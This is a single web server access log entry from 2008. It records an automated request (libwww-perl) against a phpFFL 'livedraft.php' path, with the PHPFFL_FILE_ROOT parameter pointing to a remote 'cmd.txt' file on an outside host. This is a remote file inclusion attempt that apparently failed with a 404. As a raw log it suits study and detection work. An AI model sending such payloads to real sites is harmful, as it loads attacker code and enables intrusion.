69.89.25.169 - - [26/Jan/2008:06:44:39 -0800] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
